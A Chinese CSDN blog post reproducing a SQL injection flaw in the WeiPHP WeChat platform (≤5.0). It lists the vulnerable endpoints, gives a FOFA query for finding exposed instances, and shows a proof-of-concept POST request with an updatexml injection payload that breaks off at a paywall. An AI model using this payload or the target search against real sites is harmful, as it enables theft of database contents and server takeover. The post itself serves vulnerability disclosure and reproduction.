WeiPHP 微信开发平台 SQL注入漏洞复现

已于 2023-12-05 18:15:01 修改
阅读量942 收藏 7
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-05 18:13:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134813433
版权

0x01 产品简介

 weiphp 是一个开源,高效,简洁的微信开发平台,基于 oneThink 内容管理框架实现。

0x02 漏洞概述

 weiphp 微信开发平台 _send_by_group、 wp_where、 get_package_template等接口处存在 SQL 注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

weiphp <=5.0

0x04 复现环境

FOFA:app="WeiPHP"

4f7d20f99e004da7b395562fad542aee.png

0x05 漏洞复现

PoC-1

POST /public/index.php/weixin/message/_send_by_group HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

group_id[0]=exp&group_id[1]=%29+and+updatexml
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 523
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
weiPHP微信开发框架
weixin_33724570的博客
04-08 169
网址:http://www.weiphp.cn/index.php?s=/home/index/weiphp
WEB安全漏洞30讲》(第1讲)SQL注入漏洞
午夜安全
04-20 3022
工作多年后,我打算将Web漏洞做一个整理记录,一方面方便自己,另一方面方便想要学习或转行网络安全行业的小伙伴,从本文开始,我将从漏洞原理、漏洞测试、漏洞修复等方面详细讲解Web安全系列漏洞SQL注入漏洞,就是通过把SQL命令插入到URL地址、Web表单提交或页面请求的查询字符串中,最终达到欺骗服务器执行恶意的SQL 命令。漏洞成因是程序没有对用户输入的内容进行安全检查,直接代入数据库进行查询,导致了sql注入的发生。SQL注入漏洞包括:union注入、boolean注入、报错注入、时间盲注、堆叠查询注入、
weiphp mysql5.1_weiphp微信公众平台 v4.0 beta
weixin_36257615的博客
02-05 108
weiphp微信公众平台 v4.0 beta更新日志1.更加人性化的后台操作2.更多公众号接口的实现3.更加简单而快捷的微信二次开发weiphp微信公众平台简介weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。weiphp的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频...
weiphp微信开发教程】留言板插件开发详解
weixin_30622107的博客
07-08 112
基于weiphp框架的留言板插件教程: 1、功能分析 传统的留言板应该具有发布留言、查看留言、回复留言、管理留言等功能,本教程开发的是最基本的留言板,仅包含发布留言和查看留言两个功能,根据功能用bootstrap制作的前台页面样式如下: 2、新建weiphp插件 在第一步我们根据留言板的功能需求设计了前台效果页面,那么接下来的步骤就是根据效...
weiphp微信支付开发教程
技术干货分享
09-24 4597
1、下载微信官方支付API https://mp.weixin.qq.com/paymch/readtemplate?t=mp/business/course3_tmpl&lang=zh_CN 2、将WxPayPubHelper文件夹拷贝到wp下的ThinkPHP\Library\Vendor\WxPay 目录下 3、配置WxPay.pub.config.php 4、配置微信公众平
微信公众平台开发框架WeiPHP——插件开发 有大用
u010227042的博客
01-13 6236
1、介绍:         对于开发者来说,整个框架系统最重要的就是插件开发了,很多功能需求都需要插件来完成。插件的制作其实主要分为两种,一种是web接口调用,比如:天气查询、物流查询、考试成绩查询等等,这些都需要通过访问其他网站的开放接口来获取相应数据,在获取数据后以文本形式或图文消息回复给用户。还有一种就是网站制作,具体点儿就是一个小型的功能微站,比如留言板、预约、抽奖等,这些都需要
WeiPHP 微信开发简介
Hani的 编程生活
09-12 1453
wp_model  wp_attribute
php前台登录 sql注入_ECShop 4.0 前台SQL注入漏洞分析(需用户注册)
weixin_39711867的博客
03-09 487
#00 前言前两天看到有公众号发了ECShop的注入分析漏洞,所以想看下与笔者挖的是否重复,看完还是非常佩服作者的分析水平,基于Nday然后对整个利用链进行回溯分析,从而发现0day,对代码审计人员帮助颇多,不过这个漏洞需要用户注册,严格意义上来讲需要进行用户认证,因此危害性还不至于那么广泛。#01 漏洞分析整个漏洞利用链是基于两年前广泛流传的ECShop RCE漏洞链来的,笔者在挖掘ECShop...
weiphp微信公众平台框架 v3.0 正式版
12-10
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。
weiphp微信公众平台授权设置
10-23
本文给大家分享的是一款开源的微信公众平台weiphp的授权设置教程,非常的实用,有使用weiphp平台的小伙伴可以参考下。
weiphp微信公众平台框架 v4.0 beta
01-01
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。 weiphp的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微
weiphp微信公众平台 v4.0 beta.zip
07-06
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。 weiphp的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 467
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 435
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 187
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
访问网站显示不安全怎么办?
joySSL_的博客
08-02 398
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
云原生安全检测工具(容器安全、trivy、veinmind-tools)
墨痕诉清风的博客
07-31 565
例如上文的 mysql:5.7 镜像,在扫描镜像包含的 openssl 库时,会根据操作系统版本,去 trivy.db 的"Oracle Linux 7"、“openssl”桶中查询相关漏洞信息,并最终生成 CVE-2021-23840 漏洞告警。如果没有,则需要解析基础镜像,并根据其中的操作系统版本文件(etc/alpine-release、usr/lib/os-release、/etc/os-release 等),来确定基础镜像的操作系统版本。‍‍Trivy 的漏洞库,名叫 trivy-db​​。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值